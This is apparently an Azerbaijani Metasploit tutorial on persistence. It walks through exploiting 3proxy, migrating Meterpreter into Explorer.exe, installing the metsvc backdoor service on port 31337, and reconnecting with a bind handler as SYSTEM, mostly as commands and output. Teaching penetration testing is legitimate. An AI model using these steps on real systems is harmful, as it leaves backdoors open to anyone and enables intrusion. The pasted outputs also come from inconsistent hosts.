Meterpreter metsvc
Hədəf sisteminə daxil olduqdan sonra qaliciliqi qorumağın bir yolu metsvc
xidmətindən istifadə etməkdir. Bu xidmətlə istədiyiniz zaman Meterpreter-ə yenidən daxil ola bilərsiniz. Metsvc haqqında ətraflı məlumatı keçiddən istifadə edərək görə bilərsiniz.
Metsvc haqqında bilməli olduğunuz vacib bir məqamı vurğulayaq. Bu xidməti yerləşdirdiyiniz kompüterin uyğun portunu tapan hər kəs bu arxa qapıdan istifadə edə bilər. Pentest prosesi zamanı istifadə etdikdən sonra ləğv etməlisiniz, əks halda sistemi zərərli insanlar üçün açıq hala gətirəcəksiniz. Sistem sahibləri bunu qətiyyən bəyənməyə bilər.
Əvvəlcə sistemdəki əlaqəli modulu istifadə edərək bir sessiya açaq.
msf exploit(3proxy) > exploit
[*] Started reverse handler
[*] Trying target Windows XP SP2 - English...
[*] Sending stage (719360 bytes)
[*] Meterpreter session 1 opened (192.168.1.101:4444 -> 192.168.1.104:1983)
ps
Explorer.exe
Proqramın PID nömrəsi ilə əmr verin və
migrate
PID proqram nömrəsi əmrini ötürək.
meterpreter > ps
Process list
============
PID Name Path
--- ---- ----
132 ctfmon.exe C:\WINDOWS\system32\ctfmon.exe
176 svchost.exe C:\WINDOWS\system32\svchost.exe
440 VMwareService.exe C:\Program Files\VMware\VMware Tools\VMwareService.exe
632 Explorer.EXE C:\WINDOWS\Explorer.EXE
796 smss.exe \SystemRoot\System32\smss.exe
836 VMwareTray.exe C:\Program Files\VMware\VMware Tools\VMwareTray.exe
844 VMwareUser.exe C:\Program Files\VMware\VMware Tools\VMwareUser.exe
884 csrss.exe \??\C:\WINDOWS\system32\csrss.exe
908 winlogon.exe \??\C:\WINDOWS\system32\winlogon.exe
952 services.exe C:\WINDOWS\system32\services.exe
964 lsass.exe C:\WINDOWS\system32\lsass.exe
1120 vmacthlp.exe C:\Program Files\VMware\VMware Tools\vmacthlp.exe
1136 svchost.exe C:\WINDOWS\system32\svchost.exe
1236 svchost.exe C:\WINDOWS\system32\svchost.exe
1560 alg.exe C:\WINDOWS\System32\alg.exe
1568 WZCSLDR2.exe C:\Program Files\ANI\ANIWZCS2 Service\WZCSLDR2.exe
1596 jusched.exe C:\Program Files\Java\jre6\bin\jusched.exe
1656 msmsgs.exe C:\Program Files\Messenger\msmsgs.exe
1748 spoolsv.exe C:\WINDOWS\system32\spoolsv.exe
1928 jqs.exe C:\Program Files\Java\jre6\bin\jqs.exe
2028 snmp.exe C:\WINDOWS\System32\snmp.exe
2840 3proxy.exe C:\3proxy\bin\3proxy.exe
3000 mmc.exe C:\WINDOWS\system32\mmc.exe
meterpreter > migrate 632
[*] Migrating to 632...
[*] Migration completed successfully.
metsvc
Modulu istifadə etməzdən əvvəl köməyə baxaq və bizə hansı imkanlar verdiyini görək.
meterpreter > run metsvc -h
[*]
OPTIONS:
-A Automatically start a matching multi/handler to connect to the service
-h This help menu
-r Uninstall an existing Meterpreter service (files must be deleted manually)
meterpreter >
metsvc
Normalda, bu da bizə geri bağlantılar təmin edən bir proqramdır, lakin Meterpreter-də artıq daxil olduğumuz üçün hələlik geri əlaqələrə ehtiyacımız yoxdur. Gəlin yalnız proqramı işə salaq.
meterpreter > run metsvc
[*] Creating a meterpreter service on port 31337
[*] Creating a temporary installation directory C:\DOCUME~1\victim\LOCALS~1\Temp\JplTpVnksh...
[*] >> Uploading metsrv.dll...
[*] >> Uploading metsvc-server.exe...
[*] >> Uploading metsvc.exe...
[*] Starting the service...
[*] * Installing service metsvc
* Starting service
Service metsvc successfully installed.
meterpreter >
metsvc
başladı və indi qoşulmağı gözləyir. Gəlin bu xidmətlə necə əlaqə quracağımızı görək.
Hədəf sistemindəki dinləmə vəziyyəti metsvc
ilə əlaqə qurmaq windows/metsvc_bind_tcp
üçün faydalı yük modulundan istifadə edəcəyik. Aşağıdakı nümunədəki kimi modulu aktivləşdirək və lazımi PORT parametrlərini edək.
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/metsvc_bind_tcp
PAYLOAD => windows/metsvc_bind_tcp
msf exploit(handler) > set LPORT 31337
LPORT => 31337
msf exploit(handler) > set RHOST 192.168.1.104
RHOST => 192.168.1.104
msf exploit(handler) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/metsvc_bind_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique: seh, thread, process
LPORT 31337 yes The local port
RHOST 192.168.1.104 no The target address
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf exploit(handler) > exploit
[*] Starting the payload handler...
[*] Started bind handler
[*] Meterpreter session 2 opened (192.168.1.101:60840 -> 192.168.1.104:31337)
Gördüyünüz kimi session 2
avtomatik açıldı. İndi metsvc
xidmətin hədəf kompüterdə hansı PID nömrəsini işlədiyini görək.
meterpreter > ps
Process list
============
PID Name Path
--- ---- ----
140 smss.exe \SystemRoot\System32\smss.exe
168 csrss.exe \??\C:\WINNT\system32\csrss.exe
188 winlogon.exe \??\C:WINNT\system32\winlogon.exe
216 services.exe C:\WINNT\system32\services.exe
228 lsass.exe C:\WINNT\system32\lsass.exe
380 svchost.exe C:\WINNT\system32\svchost.exe
408 spoolsv.exe C:\WINNT\system32\spoolsv.exe
444 svchost.exe C:\WINNT\System32\svchost.exe
480 regsvc.exe C:\WINNT\system32\regsvc.exe
500 MSTask.exe C:\WINNT\system32\MSTask.exe
528 VMwareService.exe C:\Program Files\VMware\VMware Tools\VMwareService.exe
564 metsvc.exe c:\WINNT\my\metsvc.exe
588 WinMgmt.exe C:\WINNT\System32\WBEM\WinMgmt.exe
676 cmd.exe C:\WINNT\System32\cmd.exe
724 cmd.exe C:\WINNT\System32\cmd.exe
764 mmc.exe C:\WINNT\system32\mmc.exe
816 metsvc-server.exe c:\WINNT\my\metsvc-server.exe
888 VMwareTray.exe C:\Program Files\VMware\VMware Tools\VMwareTray.exe
896 VMwareUser.exe C:\Program Files\VMware\VMware Tools\VMwareUser.exe
940 firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
972 TPAutoConnSvc.exe C:\Program Files\VMware\VMware Tools\TPAutoConnSvc.exe
1000 Explorer.exe C:\WINNT\Explorer.exe
1088 TPAutoConnect.exe C:\Program Files\VMware\VMware Tools\TPAutoConnect.exe
meterpreter > pwd C:\WINDOWS\system32
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
Çıxışdan göründüyü kimi, metsvc
proqram 564 PID nömrəsi ilə işləyir. Artıq istədiyiniz vaxt windows/metsvc_bind_tcp
yükləmə modulundan istifadə edərək hədəf kompüterdə dinləyən proqrama qoşula bilərik .
Yenidən xatırlatmaq üçün, təhlükəsizlik testi bitdikdən metsvc
sonra proqramı sistemdən silməlisiniz.